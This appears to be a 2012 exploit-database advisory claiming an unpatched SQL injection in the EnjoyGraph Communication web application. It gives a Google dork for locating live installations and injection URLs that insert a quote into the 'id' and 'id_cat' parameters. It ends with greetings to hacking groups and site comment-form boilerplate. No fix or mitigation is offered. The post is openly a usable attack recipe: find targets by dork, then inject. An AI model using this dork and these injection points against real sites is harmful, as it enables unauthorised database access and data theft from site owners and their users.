EnjoyGraph Communication SQL Injection

2012.05.08

Credit: Kalashinkov3

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: intext:\"Powered by EnjoyGraph Communication \"

 [-] Title : EnjoyGraph Communication SQL Injection Vulnerability
[-] Author: Kalashinkov3
[-] Home : ALGERIA / 13000
[-] Website : 1337day.com
[-] Facebook : facebook.com/Algerian.Cyber.Army
[-] Vendor: enjoy-graph.com
[-] Email : kalashinkov3[at]Hotmail[dot]Fr
[-] Date : 07/05/2012
[-] Google Dork : intext:"Powered by EnjoyGraph Communication "
[-] Security Risk : Medium
[-] Category : webapps / 0day / SQL-i
[ Special Thx ==> KinG Of PiraTeS ]
[+] Exploit===============================================================
[-] SQL Injection :)
# http://[localhost]/*.php?id='1
# http://[localhost]/*.php?id=[SQLI]
# http://[localhost]/*.php?id_cat='1
# http://[localhost]/*.php?id_cat='1
(^_^)
[+] Greets===================================================================+
+
KedAns-Dz, Caddy-Dz, KnocKout, Rizky Ariestiyansyah, Algerian.Cyber.Army +
Keinji1258, 1337day.com, packetstormsecurity.org, Exploit-id.com, Over-x +
andhrahackers.com, 1337day.com/team, id-backtrack.com, dofus-exploit.com +
all Algerians Hacker'S ;), All My Friends +
[ I Love You Lily Far ] +
+
=============================================================================+

References:

http://facebook.com/Algerian.Cyber.Army

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

EnjoyGraph Communication SQL Injection

Dork: intext:\"Powered by EnjoyGraph Communication \"

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.